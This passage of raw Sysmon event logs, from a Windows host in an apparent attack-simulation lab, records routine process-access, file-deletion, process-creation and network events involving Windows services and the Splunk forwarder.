dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:08.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:09.890{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:09.890{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:09.890{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x800000000000000011387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.609{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF533E822E36B61B3588F79443C3BD71,SHA256=45946595DA09B0DA0A469407E08F31F18BA348AEE41A7870C75AFB7C3FA9F399,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:09.468{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66A1-6064-8101-00000000AE01}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-66A1-6064-8101-00000000AE01}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66A1-6064-8101-00000000AE01}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.469{266CAFBE-66A1-6064-8101-00000000AE01}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:10.609{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9334F4B36C50CE0D673C6E30A8E2CDC6,SHA256=944AE929371D9A0C21D346A7342DBD6B79A44AF6B94C2C81F75541033900990C,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000011396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:10.062{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:10.062{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:10.062{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:10.062{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:10.062{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:10.062{266CAFBE-64C4-6064-9C00-00000000AE01}46201988C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:11.640{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E2D766A02A21AEBC9324F45282F4C33,SHA256=4D51AAEB2C5B0D683E0FA573EB5AE829CD98184DACA3BE1EFF3A04FA317F0BF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.537{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53720-false10.0.1.12-8000- 23542300x800000000000000011400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:12.655{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC1DC2C09B4E2994BB9115A937101221,SHA256=B96E5D83B6F6234905D8E7FB1E90A9FA6E49E54D900D31849129736CBA650C36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:13.702{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=950BC7BFC8D9FF5AE9042F8AC8224020,SHA256=73EF8248F05C6850B995C041E0B0FD639DA84C08A1A7E4255894497759B13306,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:14.733{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=354C349540EAC34D3F6C5AE143692D0B,SHA256=1DB216849F9171473CF7298D815C1239871C30DBEECE2BC938630BB1A299FA87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:15.796{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A1BC29570EBFAAC1C3C03D77530082B,SHA256=381DEBBF8F81649D274AC20FAB880CAFEDAC4D261643B15DC70EC20192737B2A,IMPHASH=00000000000000000000000000000000falsetrue 